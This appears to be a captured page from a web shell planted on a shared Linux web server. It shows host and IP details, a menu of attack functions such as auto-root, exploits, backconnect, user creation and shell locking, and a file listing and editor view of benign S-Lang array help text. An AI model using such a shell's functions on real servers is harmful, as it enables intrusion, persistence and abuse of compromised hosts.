Linux iad1-shared-b7-18 6.6.49-grsec-jammy+ #10 SMP Thu Sep 12 23:23:08 UTC 2024 x86_64
Apache
: 67.205.6.31 | : 216.73.216.47
Cant Read [ /etc/named.conf ]
8.2.29
fernandoquevedo
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
usr /
share /
slsh /
help /
[ HOME SHELL ]
Name
Size
Permission
Action
arrayfuns.hlp
1.79
KB
-rw-r--r--
base64funs.hlp
5.92
KB
-rw-r--r--
chksumfuns.hlp
1.82
KB
-rw-r--r--
cmdopt.hlp
6.83
KB
-rw-r--r--
csvfuns.hlp
14.14
KB
-rw-r--r--
forkfuns.hlp
5.42
KB
-rw-r--r--
fswalk.hlp
4.2
KB
-rw-r--r--
glob.hlp
458
B
-rw-r--r--
histfuns.hlp
7.08
KB
-rw-r--r--
jsonfuns.hlp
3.15
KB
-rw-r--r--
listfuns.hlp
5.68
KB
-rw-r--r--
onigfuns.hlp
5.3
KB
-rw-r--r--
pcrefuns.hlp
6.45
KB
-rw-r--r--
pngfuns.hlp
8.86
KB
-rw-r--r--
print.hlp
1.92
KB
-rw-r--r--
process.hlp
7.45
KB
-rw-r--r--
profile.hlp
3.38
KB
-rw-r--r--
randfuns.hlp
15.06
KB
-rw-r--r--
readascii.hlp
4.7
KB
-rw-r--r--
require.hlp
2.38
KB
-rw-r--r--
setfuns.hlp
3.33
KB
-rw-r--r--
slsmg.hlp
12.42
KB
-rw-r--r--
sockfuns.hlp
6.34
KB
-rw-r--r--
statsfuns.hlp
24.29
KB
-rw-r--r--
structfuns.hlp
2.48
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : arrayfuns.hlp
rearrange SYNOPSIS Rearrange the elements of a 1-d array or list. USAGE rearrange (A, indices) DESCRIPTION This function performs an in-place rearrangment of the the elements of an array according to the specified permutation, represented by the `indices' argument. The `indices' array is assumed to contain unique integers in the range `[0,length(A)-1]'. NOTES The function modifies the elements of the `indices' array while it performs the rearrangement. The values will get restored upon return from function. The algorithm used was derived from the DPPERM function, which is part of the SLATEC package. See `http://gams.nist.gov/cgi-bin/serve.cgi/Package/SLATEC'. SEE ALSO array_reverse, array_swap -------------------------------------------------------------- reverse SYNOPSIS Reverse the elements of a 1-d array USAGE Array_Type reverse (Array_Type A) DESCRIPTION The `reverse' function reverses the elements of a 1-d array and returns the result. SEE ALSO shift -------------------------------------------------------------- shift SYNOPSIS Shift the elements of a 1-d array USAGE Array_Type shift (Array_Type A, Int_Type n) DESCRIPTION The `shift' function shifts the elements of an array by a specified amount and returns the result. If `n' is positive, the ith element of the array will be shifted to the position `i-n' of the array. Elements for which `i-n' is less than 0 will be moved to the end of the array. EXAMPLE A = [1,2,3,4,5,6,7,8,9]; B = shift (A, 3); % ==> B = [4,5,6,7,8,9,1,2,3]; C = shift (A, -1); % ==> C = [9,1,2,3,4,5,6,7,8]; NOTES It many ways `rotate' would be a better name for this function. SEE ALSO reverse, transpose --------------------------------------------------------------
Close